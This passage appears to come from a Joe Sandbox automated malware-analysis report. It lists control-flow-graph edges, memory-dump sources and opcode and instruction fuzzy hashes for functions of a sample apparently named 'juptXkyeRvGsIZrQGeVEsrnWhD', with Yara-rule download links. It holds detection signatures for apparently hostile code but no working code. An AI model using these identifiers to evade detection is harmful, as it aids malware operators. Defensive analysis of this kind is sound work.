7ffd9b89b4d0-7ffd9b89b51c 951->959 980 7ffd9b89b405-7ffd9b89b40a 956->980 981 7ffd9b89b3fd-7ffd9b89b402 956->981 957->956 958->968 959->958 978 7ffd9b89b798-7ffd9b89b7d4 966->978 979 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 966->979 971 7ffd9b89b721-7ffd9b89b72e 968->971 971->949 974 7ffd9b89b5d7-7ffd9b89b5e5 971->974 975 7ffd9b89b5e7 974->975 976 7ffd9b89b5ec-7ffd9b89b646 974->976 975->976 992 7ffd9b89b6b6-7ffd9b89b6de 976->992 993 7ffd9b89b648-7ffd9b89b670 976->993 987 7ffd9b89b7d6-7ffd9b89b7ed 978->987 988 7ffd9b89b7f1-7ffd9b89ba58 978->988 999 7ffd9b89babb-7ffd9b89baef 979->999 1000 7ffd9b89bab4 979->1000 980->941 981->980 987->988 988->966 995 7ffd9b89b6e5-7ffd9b89b70e 992->995 996 7ffd9b89b6e0 992->996 997 7ffd9b89b677-7ffd9b89b6b4 993->997 998 7ffd9b89b672 993->998 1009 7ffd9b89b719-7ffd9b89b71e 995->1009 996->995 997->1009 998->997 1004 7ffd9b89bb0f-7ffd9b89bb35 999->1004 1005 7ffd9b89baf1-7ffd9b89bafe 999->1005 1000->999 1007 7ffd9b89bb05-7ffd9b89bb0d 1005->1007 1008 7ffd9b89bb00 1005->1008 1007->1004 1008->1007 1009->971
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: dda7d5c85c5ca0c1bd956f99c2438b4ff8f82b75db7682cdd590f5775e3d4ba1
                                                                                                                                      • Instruction ID: 57a0043c0dd544101301821cde5a972b4229a5ac3483c9cf33cb69658f596b59
                                                                                                                                      • Opcode Fuzzy Hash: dda7d5c85c5ca0c1bd956f99c2438b4ff8f82b75db7682cdd590f5775e3d4ba1
                                                                                                                                      • Instruction Fuzzy Hash: 1DD1D970E0991D8FDFA8DF58C894AA9B7B1FF98301F1141E9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89B016 Relevance: .3, Instructions: 321COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1011 7ffd9b89b016-7ffd9b89b05f 1014 7ffd9b89b0b8-7ffd9b89b0be 1011->1014 1015 7ffd9b89b0c0-7ffd9b89b0cf 1014->1015 1016 7ffd9b89b061-7ffd9b89b09c 1014->1016 1017 7ffd9b89b0ff-7ffd9b89b10b 1015->1017 1019 7ffd9b89b09e 1016->1019 1020 7ffd9b89b0a3-7ffd9b89b0b5 1016->1020 1021 7ffd9b89b116-7ffd9b89b134 1017->1021 1019->1020 1020->1014 1023 7ffd9b89b137-7ffd9b89b13d 1021->1023 1024 7ffd9b89ad54-7ffd9b89add4 1023->1024 1025 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 1023->1025 1034 7ffd9b89add6-7ffd9b89ade2 1024->1034 1035 7ffd9b89ae04-7ffd9b89ae13 1024->1035 1039 7ffd9b89b179-7ffd9b89b187 1025->1039 1040 7ffd9b89ae31-7ffd9b89ae39 1034->1040 1041 7ffd9b89ade4-7ffd9b89adf9 1034->1041 1037 7ffd9b89ae15 1035->1037 1038 7ffd9b89ae1a-7ffd9b89ae29 1035->1038 1037->1038 1042 7ffd9b89ae2b-7ffd9b89ae2c 1038->1042 1043 7ffd9b89ae3e-7ffd9b89ae59 1038->1043 1044 7ffd9b89b192-7ffd9b89b21b 1039->1044 1040->1021 1041->1035 1042->1040 1045 7ffd9b89ae79-7ffd9b89b0dd 1043->1045 1046 7ffd9b89ae5b-7ffd9b89ae75 1043->1046 1056 7ffd9b89b221-7ffd9b89b2aa 1044->1056 1057 7ffd9b89b2b3-7ffd9b89b2d5 1044->1057 1051 7ffd9b89b12c-7ffd9b89b134 1045->1051 1052 7ffd9b89b0df-7ffd9b89b0f4 1045->1052 1046->1045 1051->1023 1052->1017 1056->1057 1075 7ffd9b89b2ac 1056->1075 1060 7ffd9b89b426-7ffd9b89b4bc 1057->1060 1061 7ffd9b89b2db-7ffd9b89b326 1057->1061 1080 7ffd9b89b57f-7ffd9b89b5c5 1060->1080 1081 7ffd9b89b4c2-7ffd9b89b4ce 1060->1081 1071 7ffd9b89b40d-7ffd9b89b41a 1061->1071 1073 7ffd9b89b32b-7ffd9b89b339 1071->1073 1074 7ffd9b89b420-7ffd9b89b421 1071->1074 1076 7ffd9b89b33b 1073->1076 1077 7ffd9b89b340-7ffd9b89b3a2 1073->1077 1079 7ffd9b89b734-7ffd9b89b793 1074->1079 1075->1057 1076->1077 1086 7ffd9b89b3a9-7ffd9b89b3fb 1077->1086 1087 7ffd9b89b3a4 1077->1087 1096 7ffd9b89ba5b-7ffd9b89ba88 1079->1096 1098 7ffd9b89b5cc-7ffd9b89b5d2 1080->1098 1088 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 1081->1088 1089 7ffd9b89b4d0-7ffd9b89b51c 1081->1089 1110 7ffd9b89b405-7ffd9b89b40a 1086->1110 1111 7ffd9b89b3fd-7ffd9b89b402 1086->1111 1087->1086 1088->1098 1089->1088 1108 7ffd9b89b798-7ffd9b89b7d4 1096->1108 1109 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 1096->1109 1101 7ffd9b89b721-7ffd9b89b72e 1098->1101 1101->1079 1104 7ffd9b89b5d7-7ffd9b89b5e5 1101->1104 1105 7ffd9b89b5e7 1104->1105 1106 7ffd9b89b5ec-7ffd9b89b646 1104->1106 1105->1106 1122 7ffd9b89b6b6-7ffd9b89b6de 1106->1122 1123 7ffd9b89b648-7ffd9b89b670 1106->1123 1117 7ffd9b89b7d6-7ffd9b89b7ed 1108->1117 1118 7ffd9b89b7f1-7ffd9b89ba58 1108->1118 1129 7ffd9b89babb-7ffd9b89baef 1109->1129 1130 7ffd9b89bab4 1109->1130 1110->1071 1111->1110 1117->1118 1118->1096 1125 7ffd9b89b6e5-7ffd9b89b70e 1122->1125 1126 7ffd9b89b6e0 1122->1126 1127 7ffd9b89b677-7ffd9b89b6b4 1123->1127 1128 7ffd9b89b672 1123->1128 1139 7ffd9b89b719-7ffd9b89b71e 1125->1139 1126->1125 1127->1139 1128->1127 1134 7ffd9b89bb0f-7ffd9b89bb35 1129->1134 1135 7ffd9b89baf1-7ffd9b89bafe 1129->1135 1130->1129 1137 7ffd9b89bb05-7ffd9b89bb0d 1135->1137 1138 7ffd9b89bb00 1135->1138 1137->1134 1138->1137 1139->1101
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ab20efcbe06575ccdd38ae4769b2847f6c968f77b74796e95ca5d73d587b04fb
                                                                                                                                      • Instruction ID: 7c7588b743481f38101082f60773beb95c6d2446990f5161b7b9b70ac2900356
                                                                                                                                      • Opcode Fuzzy Hash: ab20efcbe06575ccdd38ae4769b2847f6c968f77b74796e95ca5d73d587b04fb
                                                                                                                                      • Instruction Fuzzy Hash: 90C1DC70E0991D8FDFA8DF58C895AA9B7B1FF98301F1141A9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89ACC2 Relevance: .3, Instructions: 316COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1141 7ffd9b89acc2-7ffd9b89ad4f 1150 7ffd9b89b137-7ffd9b89b13d 1141->1150 1151 7ffd9b89ad54-7ffd9b89add4 1150->1151 1152 7ffd9b89b143-7ffd9b89b187 call 7ffd9b89c00a 1150->1152 1161 7ffd9b89add6-7ffd9b89ade2 1151->1161 1162 7ffd9b89ae04-7ffd9b89ae13 1151->1162 1171 7ffd9b89b192-7ffd9b89b21b 1152->1171 1167 7ffd9b89ae31-7ffd9b89ae39 1161->1167 1168 7ffd9b89ade4-7ffd9b89adf9 1161->1168 1164 7ffd9b89ae15 1162->1164 1165 7ffd9b89ae1a-7ffd9b89ae29 1162->1165 1164->1165 1169 7ffd9b89ae2b-7ffd9b89ae2c 1165->1169 1170 7ffd9b89ae3e-7ffd9b89ae59 1165->1170 1172 7ffd9b89b116-7ffd9b89b134 1167->1172 1168->1162 1169->1167 1173 7ffd9b89ae79-7ffd9b89b0dd 1170->1173 1174 7ffd9b89ae5b-7ffd9b89ae75 1170->1174 1186 7ffd9b89b221-7ffd9b89b2aa 1171->1186 1187 7ffd9b89b2b3-7ffd9b89b2d5 1171->1187 1172->1150 1180 7ffd9b89b12c-7ffd9b89b134 1173->1180 1181 7ffd9b89b0df-7ffd9b89b10b 1173->1181 1174->1173 1180->1150 1181->1172 1186->1187 1205 7ffd9b89b2ac 1186->1205 1190 7ffd9b89b426-7ffd9b89b4bc 1187->1190 1191 7ffd9b89b2db-7ffd9b89b326 1187->1191 1210 7ffd9b89b57f-7ffd9b89b5c5 1190->1210 1211 7ffd9b89b4c2-7ffd9b89b4ce 1190->1211 1201 7ffd9b89b40d-7ffd9b89b41a 1191->1201 1203 7ffd9b89b32b-7ffd9b89b339 1201->1203 1204 7ffd9b89b420-7ffd9b89b421 1201->1204 1206 7ffd9b89b33b 1203->1206 1207 7ffd9b89b340-7ffd9b89b3a2 1203->1207 1209 7ffd9b89b734-7ffd9b89b793 1204->1209 1205->1187 1206->1207 1216 7ffd9b89b3a9-7ffd9b89b3fb 1207->1216 1217 7ffd9b89b3a4 1207->1217 1226 7ffd9b89ba5b-7ffd9b89ba88 1209->1226 1228 7ffd9b89b5cc-7ffd9b89b5d2 1210->1228 1218 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 1211->1218 1219 7ffd9b89b4d0-7ffd9b89b51c 1211->1219 1240 7ffd9b89b405-7ffd9b89b40a 1216->1240 1241 7ffd9b89b3fd-7ffd9b89b402 1216->1241 1217->1216 1218->1228 1219->1218 1238 7ffd9b89b798-7ffd9b89b7d4 1226->1238 1239 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 1226->1239 1231 7ffd9b89b721-7ffd9b89b72e 1228->1231 1231->1209 1234 7ffd9b89b5d7-7ffd9b89b5e5 1231->1234 1235 7ffd9b89b5e7 1234->1235 1236 7ffd9b89b5ec-7ffd9b89b646 1234->1236 1235->1236 1252 7ffd9b89b6b6-7ffd9b89b6de 1236->1252 1253 7ffd9b89b648-7ffd9b89b670 1236->1253 1247 7ffd9b89b7d6-7ffd9b89b7ed 1238->1247 1248 7ffd9b89b7f1-7ffd9b89ba58 1238->1248 1259 7ffd9b89babb-7ffd9b89baef 1239->1259 1260 7ffd9b89bab4 1239->1260 1240->1201 1241->1240 1247->1248 1248->1226 1255 7ffd9b89b6e5-7ffd9b89b70e 1252->1255 1256 7ffd9b89b6e0 1252->1256 1257 7ffd9b89b677-7ffd9b89b6b4 1253->1257 1258 7ffd9b89b672 1253->1258 1269 7ffd9b89b719-7ffd9b89b71e 1255->1269 1256->1255 1257->1269 1258->1257 1264 7ffd9b89bb0f-7ffd9b89bb35 1259->1264 1265 7ffd9b89baf1-7ffd9b89bafe 1259->1265 1260->1259 1267 7ffd9b89bb05-7ffd9b89bb0d 1265->1267 1268 7ffd9b89bb00 1265->1268 1267->1264 1268->1267 1269->1231
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0eb7f89afc28e4c6f27607bebef09296573c343c8f86fca1cd9b14f008a17226
                                                                                                                                      • Instruction ID: f12e94cf80d435c9230f90e82ae6c9e1c3ff5cc2d05a47f8a58a51654664dc80
                                                                                                                                      • Opcode Fuzzy Hash: 0eb7f89afc28e4c6f27607bebef09296573c343c8f86fca1cd9b14f008a17226
                                                                                                                                      • Instruction Fuzzy Hash: B9C1EA70A0991D8FDFA8DB58C895BA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AF04 Relevance: .3, Instructions: 303COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8c013154bc7f068c5e68592f68a2d8f04684d3384e1b8c63e39351c5493b5e90
                                                                                                                                      • Instruction ID: 56d16152f02d55fa7324baa88b69c712d8d46ad7319651bca0c9231d2be63e3d
                                                                                                                                      • Opcode Fuzzy Hash: 8c013154bc7f068c5e68592f68a2d8f04684d3384e1b8c63e39351c5493b5e90
                                                                                                                                      • Instruction Fuzzy Hash: D5C1C970A0991D8FDFA8DB58C895BA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AE9C Relevance: .3, Instructions: 301COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c17a31e27f031a34f2be56f8119f66e2a763225db1c0ab222aa8c9e32448e6b2
                                                                                                                                      • Instruction ID: 3ef07b5d899f2620a8efa286732331d44bf920c06d84913625507ca8fe12d55e
                                                                                                                                      • Opcode Fuzzy Hash: c17a31e27f031a34f2be56f8119f66e2a763225db1c0ab222aa8c9e32448e6b2
                                                                                                                                      • Instruction Fuzzy Hash: 78C1C970A0991D8FDFA8DB58C895AA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AF86 Relevance: .3, Instructions: 296COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 33fddd318c1e0962a6425b1c6575c5bb90cfe34b21dadb0e69a2b9c2bed46b2b
                                                                                                                                      • Instruction ID: ef4adc9ef9c3a522fbd64df852f9257d53c237733b09a0a835e20859452eecec
                                                                                                                                      • Opcode Fuzzy Hash: 33fddd318c1e0962a6425b1c6575c5bb90cfe34b21dadb0e69a2b9c2bed46b2b
                                                                                                                                      • Instruction Fuzzy Hash: 64C1CC70A0991D8FDFA8DB58C895AA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AF99 Relevance: .3, Instructions: 292COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 62f81375c40ff546e3c93f0c868e5a99cda8d0b9cab95c706e53890b89d96d3f
                                                                                                                                      • Instruction ID: a67d9c7a94bd3c9bba3be60c31ec885dff4c3adf84b81fe0559a9a7f60d24a75
                                                                                                                                      • Opcode Fuzzy Hash: 62f81375c40ff546e3c93f0c868e5a99cda8d0b9cab95c706e53890b89d96d3f
                                                                                                                                      • Instruction Fuzzy Hash: 8EB1BB70A0991D8FDFA8DB58C895AA9B7B1FF98301F1141A9D00DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9DAD Relevance: .3, Instructions: 269COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 329e9eece734bbdb20dd1b2fabb882d8e9b084a031f2a85e34a4c1f80a24255e
                                                                                                                                      • Instruction ID: 1df5f79cb74c567cecab5507010562b6bd0778314f523fdd9373f37343e74f42
                                                                                                                                      • Opcode Fuzzy Hash: 329e9eece734bbdb20dd1b2fabb882d8e9b084a031f2a85e34a4c1f80a24255e
                                                                                                                                      • Instruction Fuzzy Hash: ACA1EA70E0961D8FDB98EF68C8A5AA9B7B2FF58304F5044A9D01DD7296DF34A981CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9E48 Relevance: .2, Instructions: 172COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1caab6519ca4fa2ca8a3ebc3d946ffc711229be457dfb0b14b74546995ef45e6
                                                                                                                                      • Instruction ID: eb9cfaf60579f4ec36b2ae12d41ad8aa03b25bef64311ef0969f4d05b9f61f2b
                                                                                                                                      • Opcode Fuzzy Hash: 1caab6519ca4fa2ca8a3ebc3d946ffc711229be457dfb0b14b74546995ef45e6
                                                                                                                                      • Instruction Fuzzy Hash: 2061B974A1592D8FDF98EF68C894BA9B7B2FF58300F5040A9D01DE72A5DB34A985CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B3000 Relevance: .2, Instructions: 162COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8b3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d2eec0e5f38575759619111fe324b1812bb89ee6c57ec22a8b0ea499258e1f11
                                                                                                                                      • Instruction ID: 8cfa5ff174b82a977abe9f964be0a4e80c754aae1363ade7128d79284a9909f4
                                                                                                                                      • Opcode Fuzzy Hash: d2eec0e5f38575759619111fe324b1812bb89ee6c57ec22a8b0ea499258e1f11
                                                                                                                                      • Instruction Fuzzy Hash: 8451027288E7C55FD7038BB09D616D03FF0AF17214B0A05DBD484CB0A3E26C5A4ADB62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8886A0 Relevance: .2, Instructions: 156COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b4114c3a0a0a1df39de8019e5ba64e16509f717edf551035c3e6e2ff78d9e93c
                                                                                                                                      • Instruction ID: 2629cd988b769783360aec1f661ba4d6348665c64e52e13ed20c467efffb8434
                                                                                                                                      • Opcode Fuzzy Hash: b4114c3a0a0a1df39de8019e5ba64e16509f717edf551035c3e6e2ff78d9e93c
                                                                                                                                      • Instruction Fuzzy Hash: CC51C670A1995D8FEBA0EB18C894BE9B7F1FF58301F4001EA915DD72A2DA746AC5CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B897039 Relevance: .1, Instructions: 138COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 420652084dbf2909a47fe9ce226466ed4d4232f9f5b4f60378424e30c9027eed
                                                                                                                                      • Instruction ID: 6f81993d50899f45081c37891edcb734b99e5e39cd5f5d10ac754332d515fbc0
                                                                                                                                      • Opcode Fuzzy Hash: 420652084dbf2909a47fe9ce226466ed4d4232f9f5b4f60378424e30c9027eed
                                                                                                                                      • Instruction Fuzzy Hash: 7551A034A09A4D9FCF84EF98D894AED7BF1FF58310B0501A6E409E7261D734E990CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CA8A5 Relevance: .1, Instructions: 135COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: af2c0172a1b8b77f90e26b09fd920bff235da5721bb88cec900c48c2c66431af
                                                                                                                                      • Instruction ID: 3444eeec5dac969f68c57c902aa8ea8f0e7991a8bc9b21cc94bb60f95f1992fb
                                                                                                                                      • Opcode Fuzzy Hash: af2c0172a1b8b77f90e26b09fd920bff235da5721bb88cec900c48c2c66431af
                                                                                                                                      • Instruction Fuzzy Hash: FB51E670E0961D8FEB65EBA4D8A57EDB7B1FF58300F1101AAD01DA3296DE346A81CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CAB84 Relevance: .1, Instructions: 102COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 06ee41895e9bb5479cf761f835de7019621e23d341a2a47906c06ea86ae5ef05
                                                                                                                                      • Instruction ID: ac74078bd02771ca39a51a51f0015374ab2d4e54045cf547286f7ef9ac402033
                                                                                                                                      • Opcode Fuzzy Hash: 06ee41895e9bb5479cf761f835de7019621e23d341a2a47906c06ea86ae5ef05
                                                                                                                                      • Instruction Fuzzy Hash: 1C41C770E1561D8FDB69EF94D8A5BEDB7B1FF18300F1001AAD01DA3296DA746A81CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF3D0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 24f7a7001523f27c79b8ba9a1a590b7f3d2eade361254c0be1cf2c26bdca9298
                                                                                                                                      • Instruction ID: bcd0ff725b99616057c8e5764e893044e353414b8df5aeb39f7b6fcf06ad576b
                                                                                                                                      • Opcode Fuzzy Hash: 24f7a7001523f27c79b8ba9a1a590b7f3d2eade361254c0be1cf2c26bdca9298
                                                                                                                                      • Instruction Fuzzy Hash: 84318E71E0950D8BEB24EB84D894BFDB7B1EB49310F21427AD009D3294CF746A898B80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896CC9 Relevance: .1, Instructions: 91COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1aa1a8c7ac11decc1bbf8afaaa35014846d66d2317917ec153cdc162e36e43f8
                                                                                                                                      • Instruction ID: 615a9b38052f005ffd7c29a6b748a9890ba235b13362755324c61ec293264abd
                                                                                                                                      • Opcode Fuzzy Hash: 1aa1a8c7ac11decc1bbf8afaaa35014846d66d2317917ec153cdc162e36e43f8
                                                                                                                                      • Instruction Fuzzy Hash: 57317C70A0964E8FDF54DF58C8A4AED7BB1FF48344F06026AE859E3291CB34A941CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8889DC Relevance: .1, Instructions: 90COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
